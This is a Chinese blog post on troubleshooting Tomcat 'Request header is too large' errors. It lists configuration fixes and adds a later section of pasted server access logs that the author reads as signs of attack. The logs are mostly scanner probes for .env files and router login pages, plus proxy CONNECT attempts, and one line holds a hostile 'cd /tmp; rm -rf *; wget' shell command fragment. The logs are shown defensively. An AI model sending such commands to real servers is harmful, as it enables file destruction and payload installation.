Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level
云服务器很久没管过了,今天去看了下云服务器日志,不看不知道,一看吓一跳。
日志里竟然是一排的报错,再翻下此前的日志,每天都报一个错误:
[http-nio-80-exec-10] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level. java.lang.IllegalArgumentException: Request header is too large at org.apache.coyote.http11.Http11InputBuffer.fill(Http11InputBuffer.java:790) at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:454) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:269) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1723) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)
随后我去查了一下,网友的说法大致为以下3种:
百度经验(2021-12-15)
1、Tomcat 的 header 缓冲区不够
需要在server.xml(tomcat根目录下的conf目录)中增加 maxHttpHeaderSize,单位为KB
<Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" maxHttpHeaderSize="8192"/>
2、Url头用的是 https
将 https 改成 http 即可(未实验)
3、Url传参时携带了特殊符号
增加了一个新特性,就是严格按照RFC3986规范进行访问解析
而RFC3986规范定义了Url中,只允许包含: 4个特殊字符
以及所有保留字符(RFC3986中指定了以下字符为保留字符:!*'();:@&=+$,/?#[])
解决方法其实很简单,可以通过修改 tomca t的 catalina.properties 的最后一行改为
tomcat.util.http.parser.HttpParser.requestTargetAllow=|{}
允许{}即可
测试结果
-
用的一直是 http 请求头
-
-
中文未转码就进行传输,实际应用中标准方式是如果Url中有中文,则要先将中文转码后才进行请求
- 2022.04.24 补充:访问 Url 中包含特殊字符,排查自己项目请求相关代码、排查服务器日志,是否被攻击
解决办法
-
可以使用 POST 请求
-
传参前 对参数长度进行限制
- 传参前 对特殊字符进行转码
补充 ( 2022-04-24 )
今天又去看了下服务器,刚启动就报了类似错误。
经过一番日志翻阅,我初步判定是云服务器被攻击了(报错估计是入侵命令引发的)。
在我发文补充的时候翻阅日志又出现了新的攻击日志。
真心建议大家做好云服务器防护
日志中出现以下内容(下面仅为局部命令,来源查询全部来自海外,估计是隐藏了IP,特殊部分标红)
193.46.255.49 - - [24/Apr/2022:00:40:10 +0800] "GET / HTTP/1.1" 404 682
67.227.38.191 - - [24/Apr/2022:01:07:57 +0800] "GET / HTTP/1.1" 404 682
39.103.158.106 - - [24/Apr/2022:01:13:31 +0800] "-" 400 2003
39.103.158.106 - - [24/Apr/2022:01:13:31 +0800] "GET / HTTP/1.1" 404 682
45.83.66.245 - - [24/Apr/2022:01:20:10 +0800] "GET / HTTP/1.1" 404 682
45.83.67.120 - - [24/Apr/2022:01:20:11 +0800] "GET /favicon.ico HTTP/1.1" 404 682
101.133.225.252 - - [24/Apr/2022:01:29:00 +0800] "-" 400 2101
101.133.225.252 - - [24/Apr/2022:01:29:00 +0800] "GET / HTTP/1.1" 404 682
221.154.57.175 - - [24/Apr/2022:02:08:17 +0800] "CONNECT blog.naver.com:80 HTTP/1.1" 400 795
123.163.114.45 - - [24/Apr/2022:02:08:17 +0800] "HEAD / HTTP/1.1" 404 -
221.154.57.175 - - [24/Apr/2022:02:08:49 +0800] "CONNECT blog.naver.com:443 HTTP/1.1" 400 795
198.235.24.2 - - [24/Apr/2022:02:12:40 +0800] "-" 400 2047
167.94.145.57 - - [24/Apr/2022:02:26:40 +0800] "GET / HTTP/1.1" 404 682
167.94.145.57 - - [24/Apr/2022:02:26:40 +0800] "GET / HTTP/1.1" 404 682
178.32.215.187 - - [24/Apr/2022:02:29:15 +0800] "GET /.env HTTP/1.1" 404 682
20.24.218.150 - - [24/Apr/2022:02:48:08 +0800] "GET /.env HTTP/1.1" 404 682
20.24.218.150 - - [24/Apr/2022:02:48:08 +0800] "GET /wp-content/ HTTP/1.1" 404 682
101.133.143.142 - - [24/Apr/2022:03:00:20 +0800] "GET / HTTP/1.1" 404 682
47.103.8.114 - - [24/Apr/2022:03:05:52 +0800] "GET / HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:21 +0800] "GET / HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:21 +0800] "GET /favicon.ico HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:22 +0800] "GET //robots.txt HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:22 +0800] "GET //sitemap.xml HTTP/1.1" 404 682
106.75.28.105 - - [24/Apr/2022:03:12:22 +0800] "GET //.well-known/security.txt HTTP/1.1" 404 682
47.102.46.26 - - [24/Apr/2022:03:38:36 +0800] "GET / HTTP/1.1" 404 682
101.133.151.212 - - [24/Apr/2022:03:43:42 +0800] "GET / HTTP/1.1" 404 682
85.202.169.124 - - [24/Apr/2022:04:09:22 +0800] "GET /config/getuser?index=0 HTTP/1.1" 404 682
193.124.7.9 - - [24/Apr/2022:04:33:44 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 682
51.222.253.11 - - [24/Apr/2022:05:55:52 +0800] "GET /robots.txt HTTP/1.1" 404 682
54.36.148.229 - - [24/Apr/2022:05:55:53 +0800] "GET / HTTP/1.1" 404 682
18.167.12.103 - - [24/Apr/2022:06:01:21 +0800] "GET / HTTP/1.1" 404 682
2.57.121.232 - - [24/Apr/2022:06:11:28 +0800] "GET / HTTP/1.1" 404 682
83.97.20.34 - - [24/Apr/2022:06:15:09 +0800] "GET / HTTP/1.0" 404 682
18.163.84.222 - - [24/Apr/2022:06:27:13 +0800] "GET / HTTP/1.1" 404 682
75.100.154.140 - - [24/Apr/2022:06:50:24 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ null" 400 1919
91.207.211.45 - - [24/Apr/2022:07:11:10 +0800] "GET / HTTP/1.1" 404 682
52.13.55.80 - - [24/Apr/2022:07:38:59 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:48 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:52 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:54 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:56 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:42:58 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:00 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:03 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:05 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:07 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:09 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:11 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:13 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:15 +0800] "CONNECT lvsenbao.cn:443 HTTP/1.1" 400 795
47.101.141.40 - - [24/Apr/2022:07:43:17 +0800] "GET / HTTP/1.1" 404 682
47.101.141.40 - - [24/Apr/2022:07:43:19 +0800] "CONNECT moyouyougame.com:2743 HTTP/1.1" 400 795
47.101.141.40 - - [24/Apr/2022:07:43:21 +0800] "GET / HTTP/1.1" 404 682
185.41.204.103 - - [24/Apr/2022:08:16:31 +0800] "GET / HTTP/1.1" 404 682
193.46.255.49 - - [24/Apr/2022:08:19:55 +0800] "GET / HTTP/1.1" 404 682
8.219.50.83 - - [24/Apr/2022:08:32:10 +0800] "GET / HTTP/1.1" 400 762
8.219.50.83 - - [24/Apr/2022:08:32:12 +0800] "-" 400 1915
8.219.50.83 - - [24/Apr/2022:08:32:18 +0800] "-" 400 1945
222.94.140.125 - - [24/Apr/2022:08:32:44 +0800] "-" 400 1931
47.92.132.229 - - [24/Apr/2022:08:44:47 +0800] "-" 400 2927
216.218.206.67 - - [24/Apr/2022:08:45:15 +0800] "GET / HTTP/1.1" 404 682
198.235.24.33 - - [24/Apr/2022:08:48:01 +0800] "GET / HTTP/1.1" 404 682
52.89.64.77 - - [24/Apr/2022:09:18:07 +0800] "GET / HTTP/1.1" 404 682